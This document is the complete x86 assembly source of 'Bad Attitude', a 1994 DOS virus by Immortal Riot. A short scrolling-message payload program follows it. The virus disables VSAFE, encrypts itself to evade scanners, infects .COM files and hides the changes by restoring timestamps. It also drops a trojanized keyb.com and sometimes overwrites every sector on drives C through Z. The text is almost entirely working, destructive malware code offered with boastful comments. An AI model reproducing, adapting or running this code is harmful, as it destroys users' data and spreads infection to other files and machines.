; -Bad Attitude- ; "Created by Immortal Riot's destructive development team" ; (c) '94 The Unforgiven/Immortal Riot ; ; "If I don't have bad attitude, this virus is harmless" ; ; Notes: ; F-Prot, Scan, Tbav, Findviru can't find shits of this virus. ; ; Disclaimer: ; If this virus damages you, it's a pleasure, but not the fault ; of the author. If you want to sue me, it's your loss. ; ; Dedication: ; I dedicate this virus to all virus writers worldwide! .MODEL TINY .CODE ORG 100h Virus_start: xchg ax,ax xchg ax,ax ; Take down VSAFE from memory! mov ax,0fa01h mov dx,5945h int 16h call get_delta_offset real_start: Get_delta_offset: ; Get delta offset pop bp sub bp, offset get_delta_offset Call_en_de_crypt: mov ax,bp add ax,11Ah push ax jmp short en_de_crypt ; First, decrypt the virus jmp short real_code_start ; and then, continue! encryption_value dw 0 ; Random value for each infection! Write_virus: call en_de_crypt ; Encrypt the virus mov ah,40h mov cx, offset virus_end-100h lea dx, [bp+100h] int 21h call en_de_crypt ; Decrypt the virus again ret En_de_crypt: mov ax,word ptr [bp+encryption_value] lea si,[bp+real_code_start] mov cx,(virus_end-real_code_start+1)/2 Xor_LoopY: xor word ptr [si],ax inc si inc si Loop Xor_LoopY ret Real_code_start: mov ah,2ch ; Get Time int 21h cmp dl,0 ; 1% jne Another_Percent call Create_file Another_Percent: cmp dl,1 ; another % jne not_this_time ; Naaaaaaah mov ah,09h ; Print the virus name lea dx,[bp+virus] int 21h Trash_sucker: ; Overwrite all sectors on all drives! mov al,2h ; on drive C - Z Drive: mov cx,1 lea bx,virus cwd Next_Sector: int 26h inc dx jnc next_sector inc al jmp short drive Not_this_time: cld Set_Dta: ; Set the dta mov ah,1ah lea dx,[bp+virus_end] int 21h Buffer_Xfer: ; Restore the beginning lea si,[bp+first_bytes] lea di,[bp+@buf] mov cx,2 rep movsw mov di,3 ; Infection-counter Get_drive: ; Get drive from where we're mov ah,19h ; executed from int 21h cmp al,2 jae Get_Dir ; A: or B:, if so, don't infect jmp restore_start ; other programs! Just return normally! Get_dir: ; Get directory from we're executed mov ah,47h ; from! xor dl,dl lea si,[bp+dirbuf+1] int 21h Find_First: ; Find first file mov cx,111b lea dx,[bp+filemask] mov ah,4eh _4fh: ; When called ah=4fh int 21h jnc clear_file_attribs ; We did find a file! chdir: ; We didn't find a file, cmp byte ptr [bp+DOSflag],1 jne dot_dott jmp no_more_files dot_dott: mov ah,3bh ; so we try in another dir! lea dx,[bp+offset dot_dot] int 21h jnc find_first mov ah,3bh ; We try to infect files in lea dx,[bp+offset DOS] ; \DOS int 21h inc byte ptr [bp+dosflag] jnc find_first jmp no_more_files Clear_file_attribs: ; Clear file attribs mov ax,4301h sub cx,cx lea dx,[bp+virus_end+1eh] int 21h Open_file: ; Open the file in read/write mode! mov ax,3d02h int 21h xchg ax,bx Read_file: ; Red the first four bytes of the file mov ah,3fh mov cx,4 lea dx,[bp+first_bytes] int 21h Check_already_infected: ; and check if it's already infected mov si,dx lea si,[bp+first_bytes] cmp word ptr [si],0e990h je already_infected cmp word ptr [si],5a4dh ; or an EXE file? je already_infected cmp word ptr [si],4d5ah ; or an EXE file? je already_infected mov ax,word ptr [bp+virus_end+1ah] ; or smaller than 400 bytes? cmp ax,400 jb already_infected cmp ax,64000 ; or bigger than 64000 bytes? ja already_infected ; if so, don't infect m! Move_file_pointer_2_EOF: call F_Ptr ; Move file-pointer to end of file sub ax,4 ; take the last four bytes Fill_1st_buf: mov word ptr [bp+Istbuf],0e990h ; Fill the four bytes mov word ptr [bp+Istbuf+2],ax ; with our own jmp-constrution! _TopOfFile: ; Move file-pointer to mov ax,4200h ; the beginning of file! int 21h Write_first4: ; Write our own jump instruction mov ah,40h mov cx,4 lea dx,[bp+Istbuf] int 21h _EOF: ; Move to end of file again call F_Ptr Get_random: ; Get a random value mov ah,2ch int 21h add dl, dh jz get_random mov word ptr [bp+encryption_value],dx ; put it as the encryption value call write_virus ; infect the file jmp short restore_time_date ; Then cover our tracks! Already_infected: inc di Restore_Time_Date: ; Restore the infected file time lea si,[bp+virus_end+16h] ; and date stamps mov cx,word ptr [si] mov dx,word ptr [si+2] mov ax,5701h int 21h Close_file: ; Close the file! mov ah,3eh int 21h Set_old_attrib: ; Set back old attribs! mov ax,4301h xor ch,ch mov cl,byte ptr [bp+virus_end+15h] lea dx,[bp+virus_end+1eh] int 21h Enough_files: ; Have we infected dec di ; 3 files this run? cmp di,0 je no_more_files mov ah,4fh ; No, then, search for the next file! jmp _4fh No_more_files: ; We've infected enough! Restore_start: lea si,[bp+@buf] mov di,100h movsw movsw Restore_dir: ; Restore the directory to lea dx,[bp+dirbuf] ; from where we were mov ah,3bh ; executed from! int 21h Exit_proc: ; and then return to the mov bx,100h ; real-file! push bx xor ax,ax retn F_Ptr: ; Move the file-pointer to end of mov ax,4202h ; file! (used twice!) xor cx, cx xor dx, dx int 21h ret Create_file: ; Create a new \dos\keyb.com Mov ah,3ch mov cx,0 lea dx,[bp+filename] int 21h Write_Da_File: xchg ax,bx mov ah,64d mov cx,len lea dx,[bp+scroll] ; Write new content in the file int 21h Close_Da_File: ; Close the trojanized file mov ah,3eh int 21h ret ; and continue.. scroll db "$R2ҴO",1ah," " scrol1 db " Q8",0ffh,"Yz!{!|!}!~!!!! !!!!! !OImmortalRiot " len equ $-scroll virus db '[BAD ATTITUDE!]$' copy db "(c) '94 The Unforgiven/Immortal Riot" Filemask db '*.COM',0 Dot_dot db '..',0 dos db '\dos',0 filename db '\dos\keyb.com',0 Buffers: First_bytes db 90h,90h,50h,0c3h ; Our own little jmp constrution! @buf db 4 dup(0) ; Empty space to be Istbuf db 4 dup(0) ; filled with instructions DIRBUF db "\" Junkie: db 64 DUP(0) dosflag db 0 virus_end: end virus_start ; ------------------------------------------------------------------------------ ; Here is the nice pay-load (read:scroll) in the Bad Attitude virus. .model tiny .code org 100h Ssscroll: mov al,dl and al,15 mov ah,3 int 10h push dx mov dh,al xor dl,dl mov ah,2 int 10h mov di,79 mov cx,1 arrow: mov ax,91Ah mov bl,10 int 10h DELAY: push cx mov cx,-200 rep lodsb pop cx mov ah,2 mov dl, I int 21h mov dl, M int 21h mov dl, M2 int 21h mov dl, O int 21h mov dl, R int 21h mov dl, T int 21h mov dl, A int 21h mov dl, L int 21h Space: mov dl, ' ' int 21h mov dl, R2 int 21h mov dl, I2 int 21h mov dl, O2 int 21h mov dl, T2 int 21h mov dl,' ' int 21h dec di jmp arrow ; Loop until a ctrl+break is pressed! heap: I db 'I' ; Immortal Riot M db 'm' M2 db 'm' o db 'o' R db 'r' T db 't' A db 'a' L db 'l' R2 db 'R' I2 db 'i' O2 DB 'o' T2 DB 't' ; Is here to stay! a13 db ' ' end Ssscroll